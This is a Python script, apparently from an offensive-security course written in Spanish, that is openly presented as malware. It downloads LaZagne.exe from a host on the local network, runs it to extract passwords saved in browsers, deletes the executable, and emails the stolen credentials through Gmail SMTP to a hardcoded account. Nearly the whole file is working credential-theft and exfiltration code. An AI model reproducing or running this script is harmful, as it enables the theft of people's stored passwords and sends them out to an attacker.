Curso-lenguaje-python/python-ofensivo/15_hacking/10_malware/02_malware.py

86 lines
1.7 KiB
Python
Raw Normal View History

2024-01-31 20:29:22 +01:00
#!/usr/bin/env python3
"""
Malware - LaZagne
LaZagne.exe https://github.com/AlessandroZ/LaZagne
Este virus no se puede ejecutar con el Windows Defender activado.
Si lo desactivamos, LaZagne recogerá las contraseñas de los navegadores y lo
enviará por correoç
Algunas librerías necesitarán instalación si se ejecuta con python directamente.
"""
import dotenv
import os
import requests
import subprocess
import smtplib
import tempfile
from email.mime.text import MIMEText
def run_command(command):
"""
Ejecutor de comandos
"""
output_command = subprocess.check_output(command, shell=True)
return output_command.decode('cp850')
def send_email(subject, body, sender, recipients, password):
"""
Envia un email con el reporte configurado
"""
msg = MIMEText(body)
msg['Subject'] = subject
msg['From'] = sender
msg['To'] = ', '.join(recipients)
with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp_server:
smtp_server.login(sender, password)
smtp_server.sendmail(sender, recipients, msg.as_string())
print(f"[i] Email sent Successfully!\n")
def download_and_execute_lazagne():
r = requests.get("http://192.168.1.120/LaZagne.exe")
temp_file = tempfile.mkdtemp()
os.chdir(temp_file)
with open("LaZagne.exe", "wb") as f:
f.write(r.content)
lazagne_output = run_command("LaZagne.exe browsers")
os.remove("LaZagne.exe")
return lazagne_output
if __name__ == '__main__':
output = download_and_execute_lazagne()
dotenv.load_dotenv()
app_passwd = os.getenv("APP_PASSWD")
send_email(
"LaZagne Browser INFO",
output,
"keyloggerseginf@gmail.com",
["keyloggerseginf@gmail.com"],
app_passwd
)